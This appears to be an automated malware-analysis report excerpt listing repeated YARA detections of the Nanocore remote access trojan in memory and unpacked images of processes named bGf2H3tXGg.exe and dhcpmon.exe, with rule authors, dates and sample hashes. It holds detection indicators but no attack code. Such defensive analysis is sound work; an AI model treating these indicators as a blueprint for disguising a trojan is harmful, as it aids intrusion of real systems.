        Source: Process Memory Space: bGf2H3tXGg.exe PID: 6468, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 6468, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 6704, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 6704, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 204, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 204, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: dhcpmon.exe PID: 6212, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: dhcpmon.exe PID: 6212, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: dhcpmon.exe PID: 6816, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: dhcpmon.exe PID: 6816, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: dhcpmon.exe PID: 6600, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: dhcpmon.exe PID: 6600, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: dhcpmon.exe PID: 6752, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: dhcpmon.exe PID: 6752, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.24bcc88.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.24bcc88.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 11.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.4960000.9.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.4960000.9.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.4960000.9.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.34e5530.5.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.34e5530.5.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.34e5530.5.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.3565530.6.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.3565530.6.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.3565530.6.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.373c0d6.13.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.373c0d6.13.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.4960000.9.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.4960000.9.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.4960000.9.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.2457edc.5.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.2457edc.5.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.35de3de.9.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.35de3de.9.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.35de3de.9.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.37332a7.15.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.37332a7.15.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.37332a7.15.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.2430000.4.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.2430000.4.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.2430000.4.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.dhcpmon.exe.28b0000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.dhcpmon.exe.28b0000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.dhcpmon.exe.28b0000.4.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.374a506.14.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.374a506.14.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.dhcpmon.exe.2870000.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 15.2.dhcpmon.exe.2870000.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.dhcpmon.exe.2870000.3.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.3495530.7.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.3495530.7.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.3495530.7.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.24c0000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.24c0000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.24c0000.3.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.340c550.8.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.340c550.8.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.254b998.4.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.254b998.4.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 11.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.3565530.6.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.3565530.6.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.3565530.6.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.35e3214.8.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.35e3214.8.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.350e3de.10.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.350e3de.10.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.350e3de.10.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.21d0000.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.21d0000.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
